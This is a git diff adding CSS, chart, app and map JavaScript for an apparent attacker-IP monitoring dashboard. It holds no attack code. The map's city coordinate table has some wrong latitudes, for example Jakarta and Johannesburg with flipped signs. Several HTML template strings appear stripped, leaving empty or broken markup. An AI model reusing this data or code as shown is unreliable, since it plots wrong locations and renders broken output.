6px; + padding: 0; +} +.leaflet-popup-content { + margin: 0; + min-width: 280px; +} +.leaflet-popup-content-wrapper a { + color: #58a6ff; +} +.leaflet-popup-tip { + background: #0d1117; + border: 1px solid #30363d; +} +.ip-detail-popup .leaflet-popup-content-wrapper { + max-width: 340px !important; +} +/* Remove the default leaflet icon background */ +.ip-custom-marker { + background: none !important; + border: none !important; +} +.ip-marker { + border: 2px solid #fff; + border-radius: 50%; + display: flex; + align-items: center; + justify-content: center; + font-size: 10px; + font-weight: bold; + color: white; + cursor: pointer; + transition: transform 0.2s, box-shadow 0.2s; +} +.ip-marker:hover { + transform: scale(1.15); +} +.marker-attacker { + background: #f85149; + box-shadow: 0 0 8px rgba(248, 81, 73, 0.8), inset 0 0 4px rgba(248, 81, 73, 0.5); +} +.marker-attacker:hover { + box-shadow: 0 0 15px rgba(248, 81, 73, 1), inset 0 0 6px rgba(248, 81, 73, 0.7); +} +.marker-bad_crawler { + background: #f0883e; + box-shadow: 0 0 8px rgba(240, 136, 62, 0.8), inset 0 0 4px rgba(240, 136, 62, 0.5); +} +.marker-bad_crawler:hover { + box-shadow: 0 0 15px rgba(240, 136, 62, 1), inset 0 0 6px rgba(240, 136, 62, 0.7); +} +.marker-good_crawler { + background: #3fb950; + box-shadow: 0 0 8px rgba(63, 185, 80, 0.8), inset 0 0 4px rgba(63, 185, 80, 0.5); +} +.marker-good_crawler:hover { + box-shadow: 0 0 15px rgba(63, 185, 80, 1), inset 0 0 6px rgba(63, 185, 80, 0.7); +} +.marker-regular_user { + background: #58a6ff; + box-shadow: 0 0 8px rgba(88, 166, 255, 0.8), inset 0 0 4px rgba(88, 166, 255, 0.5); +} +.marker-regular_user:hover { + box-shadow: 0 0 15px rgba(88, 166, 255, 1), inset 0 0 6px rgba(88, 166, 255, 0.7); +} +.marker-unknown { + background: #8b949e; + box-shadow: 0 0 8px rgba(139, 148, 158, 0.8), inset 0 0 4px rgba(139, 148, 158, 0.5); +} +.marker-unknown:hover { + box-shadow: 0 0 15px rgba(139, 148, 158, 1), inset 0 0 6px rgba(139, 148, 158, 0.7); +} +/* Custom pie-chart cluster icons */ +.ip-cluster-icon { + background: none !important; + border: none !important; +} +.leaflet-bottom.leaflet-right { + display: none !important; +} +.charts-container { + display: grid; + grid-template-columns: 1fr 1fr; + gap: 20px; + margin-top: 20px; +} +.chart-section { + display: flex; + flex-direction: column; +} +.chart-wrapper { + display: flex; + flex-direction: column; +} +#attack-types-chart { + max-height: 350px; +} +#attack-patterns-chart { + max-height: 350px; +} +@media (max-width: 1200px) { + .charts-container { + grid-template-columns: 1fr; + } +} + +/* Raw Request Modal */ +.raw-request-modal { + position: fixed; + z-index: 1000; + left: 0; + top: 0; + width: 100%; + height: 100%; + background-color: rgba(0, 0, 0, 0.7); + overflow: auto; +} +.raw-request-modal-content { + background-color: #161b22; + margin: 5% auto; + padding: 0; + border: 1px solid #30363d; + border-radius: 6px; + width: 80%; + max-width: 900px; + box-shadow: 0 8px 32px rgba(0, 0, 0, 0.5); +} +.raw-request-modal-header { + padding: 16px 20px; + background-color: #21262d; + border-bottom: 1px solid #30363d; + border-radius: 6px 6px 0 0; + display: flex; + justify-content: space-between; + align-items: center; +} +.raw-request-modal-header h3 { + margin: 0; + color: #58a6ff; + font-size: 16px; +} +.raw-request-modal-close { + color: #8b949e; + font-size: 28px; + font-weight: bold; + cursor: pointer; + line-height: 20px; + transition: color 0.2s; +} +.raw-request-modal-close:hover { + color: #c9d1d9; +} +.raw-request-modal-body { + padding: 20px; +} +.raw-request-content { + background-color: #0d1117; + border: 1px solid #30363d; + border-radius: 6px; + padding: 16px; + font-family: 'Courier New', Courier, monospace; + font-size: 12px; + color: #c9d1d9; + white-space: pre-wrap; + word-wrap: break-word; + max-height: 400px; + overflow-y: auto; +} +.raw-request-modal-footer { + padding: 16px 20px; + background-color: #21262d; + border-top: 1px solid #30363d; + border-radius: 0 0 6px 6px; + text-align: right; +} +.raw-request-download-btn { + padding: 8px 16px; + background: #238636; + color: #ffffff; + border: none; + border-radius: 6px; + font-weight: 500; + font-size: 13px; + cursor: pointer; + transition: background 0.2s; +} +.raw-request-download-btn:hover { + background: #2ea043; +} + +/* Attack Types Cell Styling */ +.attack-types-cell { + max-width: 280px; + position: relative; + display: inline-block; + width: 100%; + overflow: visible; +} +.attack-types-truncated { + display: block; + width: 100%; + max-width: 280px; + overflow: hidden; + text-overflow: ellipsis; + white-space: nowrap; + color: #fb8500; + font-weight: 500; + transition: all 0.2s; + position: relative; +} +.attack-types-tooltip { + position: absolute; + bottom: 100%; + left: 0; + background: #0d1117; + border: 1px solid #30363d; + border-radius: 6px; + padding: 12px; + margin-bottom: 8px; + max-width: 400px; + word-wrap: break-word; + white-space: normal; + z-index: 1000; + color: #c9d1d9; + font-size: 12px; + font-weight: normal; + display: none; + box-shadow: 0 8px 24px rgba(0, 0, 0, 0.5); + pointer-events: auto; +} +.attack-types-cell:hover .attack-types-tooltip { + display: block; +} +.attack-types-tooltip::after { + content: ''; + position: absolute; + top: 100%; + left: 12px; + border: 6px solid transparent; + border-top-color: #30363d; +} +.attack-types-tooltip::before { + content: ''; + position: absolute; + top: 100%; + left: 13px; + border: 5px solid transparent; + border-top-color: #0d1117; + z-index: 1; +} + +/* Path Cell Styling for Attack Table */ +.path-cell-container { + position: relative; + display: inline-block; + max-width: 100%; +} +.path-truncated { + display: block; + max-width: 250px; + overflow: hidden; + text-overflow: ellipsis; + white-space: nowrap; + cursor: pointer; + color: #f85149 !important; + font-weight: 500; + text-decoration: underline; + text-decoration-style: dotted; + text-underline-offset: 3px; + transition: all 0.2s; +} +.path-truncated:hover { + color: #ff7369 !important; + text-decoration-style: solid; +} +.path-cell-container:hover .path-tooltip { + display: block; +} +.path-tooltip { + position: absolute; + bottom: 100%; + left: 0; + background: #0d1117; + border: 1px solid #30363d; + border-radius: 6px; + padding: 8px 12px; + margin-bottom: 8px; + max-width: 500px; + word-wrap: break-word; + white-space: normal; + z-index: 1000; + color: #c9d1d9; + font-size: 12px; + font-weight: normal; + display: none; + box-shadow: 0 8px 24px rgba(0, 0, 0, 0.5); + font-family: 'Courier New', monospace; +} +.path-tooltip::after { + content: ''; + position: absolute; + top: 100%; + left: 12px; + border: 6px solid transparent; + border-top-color: #30363d; +} +.path-tooltip::before { + content: ''; + position: absolute; + top: 100%; + left: 13px; + border: 5px solid transparent; + border-top-color: #0d1117; + z-index: 1; +} + +/* Mobile Optimization - Tablets (768px and down) */ +@media (max-width: 768px) { + body { + padding: 12px; + } + .container { + max-width: 100%; + } + h1 { + font-size: 24px; + margin-bottom: 20px; + } + .github-logo { + position: relative; + top: auto; + left: auto; + margin-bottom: 15px; + } + .download-section { + position: relative; + top: auto; + right: auto; + margin-bottom: 20px; + } + .stats-grid { + grid-template-columns: repeat(2, 1fr); + gap: 12px; + margin-bottom: 20px; + } + .stat-value { + font-size: 28px; + } + .stat-card { + padding: 15px; + } + .table-container { + padding: 12px; + margin-bottom: 15px; + overflow-x: auto; + } + table { + font-size: 13px; + } + th, td { + padding: 10px 6px; + } + h2 { + font-size: 18px; + } + .tabs-container { + gap: 0; + overflow-x: auto; + -webkit-overflow-scrolling: touch; + } + .tab-button { + padding: 10px 16px; + font-size: 12px; + } + .ip-stats-dropdown { + flex-direction: column; + gap: 15px; + } + .stats-right { + flex: 0 0 auto; + width: 100%; + } + .radar-chart { + width: 160px; + height: 160px; + } + .timeline-container { + flex-direction: column; + gap: 15px; + min-height: auto; + } + .timeline-column { + flex: 1 !important; + max-height: 300px; + } + #attacker-map { + height: 350px !important; + } + .leaflet-popup-content { + min-width: 200px !important; + } + .ip-marker { + font-size: 8px; + } + .ip-detail-content { + padding: 20px; + max-width: 95%; + max-height: 85vh; + } + .download-btn { + padding: 6px 12px; + font-size: 12px; + } +} + +/* Mobile Optimization - Small phones (480px and down) */ +@media (max-width: 480px) { + body { + padding: 8px; + } + h1 { + font-size: 20px; + margin-bottom: 15px; + } + .stats-grid { + grid-template-columns: 1fr; + gap: 10px; + margin-bottom: 15px; + } + .stat-value { + font-size: 24px; + } + .stat-card { + padding: 12px; + } + .stat-label { + font-size: 12px; + } + .table-container { + padding: 10px; + margin-bottom: 12px; + border-radius: 4px; + } + table { + font-size: 12px; + } + th, td { + padding: 8px 4px; + } + th { + position: relative; + } + th.sortable::after { + right: 4px; + font-size: 10px; + } + h2 { + font-size: 16px; + margin-bottom: 12px; + } + .tabs-container { + gap: 0; + } + .tab-button { + padding: 10px 12px; + font-size: 11px; + flex: 1; + } + .ip-row { + display: block; + margin-bottom: 10px; + background: #1c2128; + padding: 10px; + border-radius: 4px; + } + .ip-row td { + display: block; + padding: 4px 0; + border: none; + } + .ip-row td::before { + content: attr(data-label); + font-weight: bold; + color: #8b949e; + margin-right: 8px; + } + .ip-clickable { + display: inline-block; + } + .ip-stats-dropdown { + flex-direction: column; + gap: 12px; + font-size: 12px; + } + .stats-left { + flex: 1; + } + .stats-right { + flex: 0 0 auto; + width: 100%; + } + .radar-chart { + width: 140px; + height: 140px; + } + .radar-legend { + margin-top: 8px; + font-size: 10px; + } + .stat-row { + padding: 4px 0; + } + .stat-label-sm { + font-size: 12px; + } + .stat-value-sm { + font-size: 13px; + } + .category-badge { + padding: 3px 6px; + font-size: 10px; + } + .timeline-container { + flex-direction: column; + gap: 12px; + min-height: auto; + } + .timeline-column { + flex: 1 !important; + max-height: 250px; + font-size: 11px; + } + .timeline-header { + font-size: 12px; + margin-bottom: 8px; + } + .timeline-item { + padding-bottom: 10px; + font-size: 11px; + } + .timeline-marker { + left: -19px; + width: 12px; + height: 12px; + } + .reputation-badge { + display: block; + margin-bottom: 6px; + margin-right: 0; + font-size: 10px; + } + #attacker-map { + height: 300px !important; + } + .leaflet-popup-content { + min-width: 150px !important; + } + .ip-marker { + font-size: 7px; + } + .ip-detail-modal { + justify-content: flex-end; + align-items: flex-end; + } + .ip-detail-content { + padding: 15px; + max-width: 100%; + max-height: 90vh; + border-radius: 8px 8px 0 0; + width: 100%; + } + .download-btn { + padding: 6px 10px; + font-size: 11px; + } + .github-logo { + font-size: 12px; + } + .github-logo svg { + width: 24px; + height: 24px; + } +} + +/* Landscape mode optimization */ +@media (max-height: 600px) and (orientation: landscape) { + body { + padding: 8px; + } + h1 { + margin-bottom: 10px; + font-size: 18px; + } + .stats-grid { + margin-bottom: 10px; + gap: 8px; + } + .stat-value { + font-size: 20px; + } + .stat-card { + padding: 8px; + } + #attacker-map { + height: 250px !important; + } + .ip-stats-dropdown { + gap: 10px; + } + .radar-chart { + width: 120px; + height: 120px; + } +} + +/* Touch-friendly optimizations */ +@media (hover: none) and (pointer: coarse) { + .ip-clickable { + -webkit-user-select: none; + user-select: none; + -webkit-tap-highlight-color: rgba(88, 166, 255, 0.2); + } + .tab-button { + -webkit-user-select: none; + user-select: none; + -webkit-tap-highlight-color: rgba(88, 166, 255, 0.2); + padding: 14px 18px; + } + .download-btn { + -webkit-user-select: none; + user-select: none; + -webkit-tap-highlight-color: rgba(36, 134, 54, 0.3); + } + input[type="checkbox"] { + width: 18px; + height: 18px; + cursor: pointer; + } +} + +/* Dynamically injected button styles (previously in JS) */ +.view-btn { + padding: 4px 10px; + background: #21262d; + color: #58a6ff; + border: 1px solid #30363d; + border-radius: 4px; + font-size: 11px; + cursor: pointer; + transition: all 0.2s; + white-space: nowrap; +} +.view-btn:hover { + background: #30363d; + border-color: #58a6ff; +} +.inspect-btn { + display: inline-flex; + align-items: center; + justify-content: center; + padding: 4px; + background: none; + border: none; + color: #8b949e; + cursor: pointer; + border-radius: 4px; + transition: color 0.2s, background 0.2s; +} +.inspect-btn svg { + width: 16px; + height: 16px; + fill: currentColor; +} +.inspect-btn:hover { + color: #58a6ff; + background: rgba(88, 166, 255, 0.1); +} +.pagination-btn { + padding: 6px 14px; + background: #21262d; + color: #c9d1d9; + border: 1px solid #30363d; + border-radius: 4px; + font-size: 12px; + cursor: pointer; + transition: all 0.2s; +} +.pagination-btn:hover:not(:disabled) { + background: #30363d; + border-color: #58a6ff; + color: #58a6ff; +} +.pagination-btn:disabled { + opacity: 0.4; + cursor: not-allowed; +} +.pagination-info { + color: #8b949e; + font-size: 12px; +} + +/* HTMX loading indicator */ +.htmx-indicator { + display: none; + color: #8b949e; + font-style: italic; + padding: 20px; + text-align: center; +} +.htmx-request .htmx-indicator { + display: block; +} +.htmx-request.htmx-indicator { + display: block; +} + +/* Alpine.js cloak */ +[x-cloak] { + display: none !important; +} + +/* ── Search Bar ────────────────────────────────────── */ +.search-bar-container { + max-width: 100%; + margin: 0 0 20px 0; +} +.search-bar { + position: relative; + display: flex; + align-items: center; +} +.search-icon { + position: absolute; + left: 14px; + width: 18px; + height: 18px; + color: #8b949e; + pointer-events: none; +} +.search-bar input[type="search"] { + width: 100%; + padding: 12px 40px 12px 42px; + background: #0d1117; + border: 1px solid #30363d; + border-radius: 6px; + color: #c9d1d9; + font-size: 14px; + outline: none; + transition: border-color 0.2s, box-shadow 0.2s; +} +.search-bar input[type="search"]::placeholder { + color: #6e7681; +} +.search-bar input[type="search"]:focus { + border-color: #58a6ff; + box-shadow: 0 0 0 3px rgba(88, 166, 255, 0.15); +} +.search-bar input[type="search"]::-webkit-search-cancel-button { + -webkit-appearance: none; + appearance: none; + width: 16px; + height: 16px; + background: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 20 20' fill='%238b949e'%3E%3Cpath d='M6.28 5.22a.75.75 0 00-1.06 1.06L8.94 10l-3.72 3.72a.75.75 0 101.06 1.06L10 11.06l3.72 3.72a.75.75 0 101.06-1.06L11.06 10l3.72-3.72a.75.75 0 00-1.06-1.06L10 8.94 6.28 5.22z'/%3E%3C/svg%3E") center/contain no-repeat; + cursor: pointer; +} +.search-spinner { + position: absolute; + right: 14px; + width: 16px; + height: 16px; + padding: 0; + border: 2px solid #30363d; + border-top-color: #58a6ff; + border-radius: 50%; + animation: spin 0.6s linear infinite; +} +@keyframes spin { + to { transform: rotate(360deg); } +} + +/* ── Search Results ───────────────────────────────── */ +.search-results { + margin-top: 12px; + background: #161b22; + border: 1px solid #30363d; + border-radius: 6px; + padding: 16px; + animation: fadeIn 0.3s ease-in; +} +@keyframes fadeIn { + from { opacity: 0; transform: translateY(-4px); } + to { opacity: 1; transform: translateY(0); } +} +.search-results-header { + display: flex; + justify-content: space-between; + align-items: center; + margin-bottom: 14px; + padding-bottom: 10px; + border-bottom: 1px solid #30363d; +} +.search-results-summary { + color: #8b949e; + font-size: 13px; +} +.search-results-summary strong { + color: #58a6ff; +} +.search-close-btn { + background: none; + border: none; + color: #8b949e; + font-size: 22px; + cursor: pointer; + padding: 0 4px; + line-height: 1; + transition: color 0.2s; +} +.search-close-btn:hover { + color: #f85149; +} +.search-section { + margin-bottom: 16px; +} +.search-section:last-of-type { + margin-bottom: 0; +} +.search-section-title { + color: #58a6ff; + font-size: 14px; + font-weight: 600; + margin: 0 0 8px 0; +} +.search-pagination { + display: flex; + justify-content: space-between; + align-items: center; + margin-top: 12px; + padding-top: 10px; + border-top: 1px solid #30363d; +} +.search-no-results { + text-align: center; + color: #4a515a; + padding: 24px 0; + font-size: 14px; +} + +/* ── Empty State (no data rows) ───────────────────── */ +.empty-state { + text-align: center; + color: #4a515a; + padding: 20px 12px; +} diff --git a/src/templates/static/js/charts.js b/src/templates/static/js/charts.js new file mode 100644 index 0000000..749019b --- /dev/null +++ b/src/templates/static/js/charts.js @@ -0,0 +1,181 @@ +// Chart.js Attack Types Chart +// Extracted from dashboard_template.py (lines ~3370-3550) + +let attackTypesChart = null; +let attackTypesChartLoaded = false; + +/** + * Load an attack types doughnut chart into a canvas element. + * @param {string} [canvasId='attack-types-chart'] - Canvas element ID + * @param {string} [ipFilter] - Optional IP address to scope results + * @param {string} [legendPosition='right'] - Legend position + */ +async function loadAttackTypesChart(canvasId, ipFilter, legendPosition) { + canvasId = canvasId || 'attack-types-chart'; + legendPosition = legendPosition || 'right'; + const DASHBOARD_PATH = window.__DASHBOARD_PATH__ || ''; + + try { + const canvas = document.getElementById(canvasId); + if (!canvas) return; + + let url = DASHBOARD_PATH + '/api/attack-types-stats?limit=10'; + if (ipFilter) url += '&ip_filter=' + encodeURIComponent(ipFilter); + + const response = await fetch(url, { + cache: 'no-store', + headers: { + 'Cache-Control': 'no-cache', + 'Pragma': 'no-cache' + } + }); + + if (!response.ok) throw new Error('Failed to fetch attack types'); + + const data = await response.json(); + const attackTypes = data.attack_types || []; + + if (attackTypes.length === 0) { + canvas.parentElement.innerHTML = '
No attack data
'; + return; + } + + const labels = attackTypes.map(item => item.type); + const counts = attackTypes.map(item => item.count); + const maxCount = Math.max(...counts); + + // Hash function to generate consistent color from string + function hashCode(str) { + let hash = 0; + for (let i = 0; i < str.length; i++) { + const char = str.charCodeAt(i); + hash = ((hash << 5) - hash) + char; + hash = hash & hash; // Convert to 32bit integer + } + return Math.abs(hash); + } + + // Dynamic color generator based on hash + function generateColorFromHash(label) { + const hash = hashCode(label); + const hue = (hash % 360); // 0-360 for hue + const saturation = 70 + (hash % 20); // 70-90 for vibrant colors + const lightness = 50 + (hash % 10); // 50-60 for brightness + + const bgColor = `hsl(${hue}, ${saturation}%, ${lightness}%)`; + const borderColor = `hsl(${hue}, ${saturation + 5}%, ${lightness - 10}%)`; // Darker border + const hoverColor = `hsl(${hue}, ${saturation - 10}%, ${lightness + 8}%)`; // Lighter hover + + return { bg: bgColor, border: borderColor, hover: hoverColor }; + } + + // Generate colors dynamically for each attack type + const backgroundColors = labels.map(label => generateColorFromHash(label).bg); + const borderColors = labels.map(label => generateColorFromHash(label).border); + const hoverColors = labels.map(label => generateColorFromHash(label).hover); + + // Create or update chart (track per canvas) + if (!loadAttackTypesChart._instances) loadAttackTypesChart._instances = {}; + if (loadAttackTypesChart._instances[canvasId]) { + loadAttackTypesChart._instances[canvasId].destroy(); + } + + const ctx = canvas.getContext('2d'); + const chartInstance = new Chart(ctx, { + type: 'doughnut', + data: { + labels: labels, + datasets: [{ + data: counts, + backgroundColor: backgroundColors, + borderColor: '#0d1117', + borderWidth: 3, + hoverBorderColor: '#58a6ff', + hoverBorderWidth: 4, + hoverOffset: 10 + }] + }, + options: { + responsive: true, + maintainAspectRatio: false, + plugins: { + legend: { + position: legendPosition, + labels: { + color: '#c9d1d9', + font: { + size: 12, + weight: '500', + family: "'Segoe UI', Tahoma, Geneva, Verdana" + }, + padding: 16, + usePointStyle: true, + pointStyle: 'circle', + generateLabels: (chart) => { + const data = chart.data; + return data.labels.map((label, i) => ({ + text: `${label} (${data.datasets[0].data[i]})`, + fillStyle: data.datasets[0].backgroundColor[i], + hidden: false, + index: i, + pointStyle: 'circle' + })); + } + } + }, + tooltip: { + enabled: true, + backgroundColor: 'rgba(22, 27, 34, 0.95)', + titleColor: '#58a6ff', + bodyColor: '#c9d1d9', + borderColor: '#58a6ff', + borderWidth: 2, + padding: 14, + titleFont: { + size: 14, + weight: 'bold', + family: "'Segoe UI', Tahoma, Geneva, Verdana" + }, + bodyFont: { + size: 13, + family: "'Segoe UI', Tahoma, Geneva, Verdana" + }, + caretSize: 8, + caretPadding: 12, + callbacks: { + label: function(context) { + const total = context.dataset.data.reduce((a, b) => a + b, 0); + const percentage = ((context.parsed / total) * 100).toFixed(1); + return `${context.label}: ${percentage}%`; + } + } + } + }, + animation: { + enabled: false + }, + onHover: (event, activeElements) => { + canvas.style.cursor = activeElements.length > 0 ? 'pointer' : 'default'; + } + }, + plugins: [{ + id: 'customCanvasBackgroundColor', + beforeDraw: (chart) => { + if (chart.ctx) { + chart.ctx.save(); + chart.ctx.globalCompositeOperation = 'destination-over'; + chart.ctx.fillStyle = 'rgba(0,0,0,0)'; + chart.ctx.fillRect(0, 0, chart.width, chart.height); + chart.ctx.restore(); + } + } + }] + }); + + loadAttackTypesChart._instances[canvasId] = chartInstance; + attackTypesChart = chartInstance; + attackTypesChartLoaded = true; + } catch (err) { + console.error('Error loading attack types chart:', err); + } +} diff --git a/src/templates/static/js/dashboard.js b/src/templates/static/js/dashboard.js new file mode 100644 index 0000000..e6e848b --- /dev/null +++ b/src/templates/static/js/dashboard.js @@ -0,0 +1,164 @@ +// Alpine.js Dashboard Application +document.addEventListener('alpine:init', () => { + Alpine.data('dashboardApp', () => ({ + // State + tab: 'overview', + dashboardPath: window.__DASHBOARD_PATH__ || '', + + // Banlist dropdown + banlistOpen: false, + + // Raw request modal + rawModal: { show: false, content: '', logId: null }, + + // Map state + mapInitialized: false, + + // Chart state + chartLoaded: false, + + // IP Insight state + insightIp: null, + + init() { + // Handle hash-based tab routing + const hash = window.location.hash.slice(1); + if (hash === 'ip-stats' || hash === 'attacks') { + this.switchToAttacks(); + } + // ip-insight tab is only accessible via lens buttons, not direct hash navigation + + window.addEventListener('hashchange', () => { + const h = window.location.hash.slice(1); + if (h === 'ip-stats' || h === 'attacks') { + this.switchToAttacks(); + } else if (h !== 'ip-insight') { + // Don't switch away from ip-insight via hash if already there + if (this.tab !== 'ip-insight') { + this.switchToOverview(); + } + } + }); + }, + + switchToAttacks() { + this.tab = 'attacks'; + window.location.hash = '#ip-stats'; + + // Delay chart initialization to ensure the container is visible + this.$nextTick(() => { + setTimeout(() => { + if (!this.chartLoaded && typeof loadAttackTypesChart === 'function') { + loadAttackTypesChart(); + this.chartLoaded = true; + } + }, 200); + }); + }, + + switchToOverview() { + this.tab = 'overview'; + window.location.hash = '#overview'; + }, + + switchToIpInsight() { + // Only allow switching if an IP is selected + if (!this.insightIp) return; + this.tab = 'ip-insight'; + window.location.hash = '#ip-insight'; + }, + + openIpInsight(ip) { + // Set the IP and load the insight content + this.insightIp = ip; + this.tab = 'ip-insight'; + window.location.hash = '#ip-insight'; + + // Load IP insight content via HTMX + this.$nextTick(() => { + const container = document.getElementById('ip-insight-htmx-container'); + if (container && typeof htmx !== 'undefined') { + htmx.ajax('GET', `${this.dashboardPath}/htmx/ip-insight/${encodeURIComponent(ip)}`, { + target: '#ip-insight-htmx-container', + swap: 'innerHTML' + }); + } + }); + }, + + async viewRawRequest(logId) { + try { + const resp = await fetch( + `${this.dashboardPath}/api/raw-request/${logId}`, + { cache: 'no-store' } + ); + if (resp.status === 404) { + alert('Raw request not available'); + return; + } + const data = await resp.json(); + this.rawModal.content = data.raw_request || 'No content available'; + this.rawModal.logId = logId; + this.rawModal.show = true; + } catch (err) { + alert('Failed to load raw request'); + } + }, + + closeRawModal() { + this.rawModal.show = false; + this.rawModal.content = ''; + this.rawModal.logId = null; + }, + + downloadRawRequest() { + if (!this.rawModal.content) return; + const blob = new Blob([this.rawModal.content], { type: 'text/plain' }); + const url = URL.createObjectURL(blob); + const a = document.createElement('a'); + a.href = url; + a.download = `raw-request-${this.rawModal.logId || Date.now()}.txt`; + document.body.appendChild(a); + a.click(); + document.body.removeChild(a); + URL.revokeObjectURL(url); + }, + + toggleIpDetail(event) { + const row = event.target.closest('tr'); + if (!row) return; + const detailRow = row.nextElementSibling; + if (detailRow && detailRow.classList.contains('ip-stats-row')) { + detailRow.style.display = + detailRow.style.display === 'table-row' ? 'none' : 'table-row'; + } + }, + })); +}); + +// Global function for opening IP Insight (used by map popups) +window.openIpInsight = function(ip) { + // Find the Alpine component and call openIpInsight + const container = document.querySelector('[x-data="dashboardApp()"]'); + if (container) { + // Try Alpine 3.x API first, then fall back to older API + const data = Alpine.$data ? Alpine.$data(container) : (container._x_dataStack && container._x_dataStack[0]); + if (data && typeof data.openIpInsight === 'function') { + data.openIpInsight(ip); + } + } +}; + +// Utility function for formatting timestamps (used by map popups) +function formatTimestamp(isoTimestamp) { + if (!isoTimestamp) return 'N/A'; + try { + const date = new Date(isoTimestamp); + return date.toLocaleString('en-US', { + year: 'numeric', month: '2-digit', day: '2-digit', + hour: '2-digit', minute: '2-digit', second: '2-digit', hour12: false + }); + } catch { + return isoTimestamp; + } +} diff --git a/src/templates/static/js/map.js b/src/templates/static/js/map.js new file mode 100644 index 0000000..1350bb9 --- /dev/null +++ b/src/templates/static/js/map.js @@ -0,0 +1,569 @@ +// IP Map Visualization +// Extracted from dashboard_template.py (lines ~2978-3348) + +let attackerMap = null; +let allIps = []; +let mapMarkers = []; // all marker objects, each tagged with .options.category +let clusterGroup = null; // single shared MarkerClusterGroup +let hiddenCategories = new Set(); + +const categoryColors = { + attacker: '#f85149', + bad_crawler: '#f0883e', + good_crawler: '#3fb950', + regular_user: '#58a6ff', + unknown: '#8b949e' +}; + +// Build a conic-gradient pie icon showing the category mix inside a cluster +function createClusterIcon(cluster) { + const children = cluster.getAllChildMarkers(); + const counts = {}; + children.forEach(m => { + const cat = m.options.category || 'unknown'; + counts[cat] = (counts[cat] || 0) + 1; + }); + + const total = children.length; + const sorted = Object.entries(counts).sort((a, b) => b[1] - a[1]); + let gradientStops = []; + let cumulative = 0; + sorted.forEach(([cat, count]) => { + const start = (cumulative / total) * 360; + cumulative += count; + const end = (cumulative / total) * 360; + const color = categoryColors[cat] || '#8b949e'; + gradientStops.push(`${color} ${start.toFixed(1)}deg ${end.toFixed(1)}deg`); + }); + + const size = Math.max(20, Math.min(44, 20 + Math.log2(total) * 4)); + const centerSize = size - 8; + const centerOffset = 4; + const ringWidth = 4; + const radius = (size / 2) - (ringWidth / 2); + const cx = size / 2; + const cy = size / 2; + const gapDeg = 8; + + // Build SVG arc segments with gaps - glow layer first, then sharp layer + let glowSegments = ''; + let segments = ''; + let currentAngle = -90; + sorted.forEach(([cat, count], idx) => { + const sliceDeg = (count / total) * 360; + if (sliceDeg < gapDeg) return; + const startAngle = currentAngle + (gapDeg / 2); + const endAngle = currentAngle + sliceDeg - (gapDeg / 2); + const startRad = (startAngle * Math.PI) / 180; + const endRad = (endAngle * Math.PI) / 180; + const x1 = cx + radius * Math.cos(startRad); + const y1 = cy + radius * Math.sin(startRad); + const x2 = cx + radius * Math.cos(endRad); + const y2 = cy + radius * Math.sin(endRad); + const largeArc = (endAngle - startAngle) > 180 ? 1 : 0; + const color = categoryColors[cat] || '#8b949e'; + // Glow layer - subtle + glowSegments += ``; + // Sharp layer + segments += ``; + currentAngle += sliceDeg; + }); + + return L.divIcon({ + html: `
` + + `` + + `` + + `${glowSegments}${segments}` + + `
${total}
` + + `
`, + className: 'ip-cluster-icon', + iconSize: L.point(size, size) + }); +} + +// City coordinates database (major cities worldwide) +const cityCoordinates = { + // United States + 'New York': [40.7128, -74.0060], 'Los Angeles': [34.0522, -118.2437], + 'San Francisco': [37.7749, -122.4194], 'Chicago': [41.8781, -87.6298], + 'Seattle': [47.6062, -122.3321], 'Miami': [25.7617, -80.1918], + 'Boston': [42.3601, -71.0589], 'Atlanta': [33.7490, -84.3880], + 'Dallas': [32.7767, -96.7970], 'Houston': [29.7604, -95.3698], + 'Denver': [39.7392, -104.9903], 'Phoenix': [33.4484, -112.0740], + // Europe + 'London': [51.5074, -0.1278], 'Paris': [48.8566, 2.3522], + 'Berlin': [52.5200, 13.4050], 'Amsterdam': [52.3676, 4.9041], + 'Moscow': [55.7558, 37.6173], 'Rome': [41.9028, 12.4964], + 'Madrid': [40.4168, -3.7038], 'Barcelona': [41.3874, 2.1686], + 'Milan': [45.4642, 9.1900], 'Vienna': [48.2082, 16.3738], + 'Stockholm': [59.3293, 18.0686], 'Oslo': [59.9139, 10.7522], + 'Copenhagen': [55.6761, 12.5683], 'Warsaw': [52.2297, 21.0122], + 'Prague': [50.0755, 14.4378], 'Budapest': [47.4979, 19.0402], + 'Athens': [37.9838, 23.7275], 'Lisbon': [38.7223, -9.1393], + 'Brussels': [50.8503, 4.3517], 'Dublin': [53.3498, -6.2603], + 'Zurich': [47.3769, 8.5417], 'Geneva': [46.2044, 6.1432], + 'Helsinki': [60.1699, 24.9384], 'Bucharest': [44.4268, 26.1025], + 'Saint Petersburg': [59.9343, 30.3351], 'Manchester': [53.4808, -2.2426], + 'Roubaix': [50.6942, 3.1746], 'Frankfurt': [50.1109, 8.6821], + 'Munich': [48.1351, 11.5820], 'Hamburg': [53.5511, 9.9937], + // Asia + 'Tokyo': [35.6762, 139.6503], 'Beijing': [39.9042, 116.4074], + 'Shanghai': [31.2304, 121.4737], 'Singapore': [1.3521, 103.8198], + 'Mumbai': [19.0760, 72.8777], 'Delhi': [28.7041, 77.1025], + 'Bangalore': [12.9716, 77.5946], 'Seoul': [37.5665, 126.9780], + 'Hong Kong': [22.3193, 114.1694], 'Bangkok': [13.7563, 100.5018], + 'Jakarta': [6.2088, 106.8456], 'Manila': [14.5995, 120.9842], + 'Hanoi': [21.0285, 105.8542], 'Ho Chi Minh City': [10.8231, 106.6297], + 'Taipei': [25.0330, 121.5654], 'Kuala Lumpur': [3.1390, 101.6869], + 'Karachi': [24.8607, 67.0011], 'Islamabad': [33.6844, 73.0479], + 'Dhaka': [23.8103, 90.4125], 'Colombo': [6.9271, 79.8612], + // South America + 'São Paulo': [-23.5505, -46.6333], 'Rio de Janeiro': [-22.9068, -43.1729], + 'Buenos Aires': [-34.6037, -58.3816], 'Bogotá': [4.7110, -74.0721], + 'Lima': [-12.0464, -77.0428], 'Santiago': [-33.4489, -70.6693], + // Middle East & Africa + 'Cairo': [30.0444, 31.2357], 'Dubai': [25.2048, 55.2708], + 'Istanbul': [41.0082, 28.9784], 'Tel Aviv': [32.0853, 34.7818], + 'Johannesburg': [26.2041, 28.0473], 'Lagos': [6.5244, 3.3792], + 'Nairobi': [-1.2921, 36.8219], 'Cape Town': [-33.9249, 18.4241], + // Australia & Oceania + 'Sydney': [-33.8688, 151.2093], 'Melbourne': [-37.8136, 144.9631], + 'Brisbane': [-27.4698, 153.0251], 'Perth': [-31.9505, 115.8605], + 'Auckland': [-36.8485, 174.7633], + 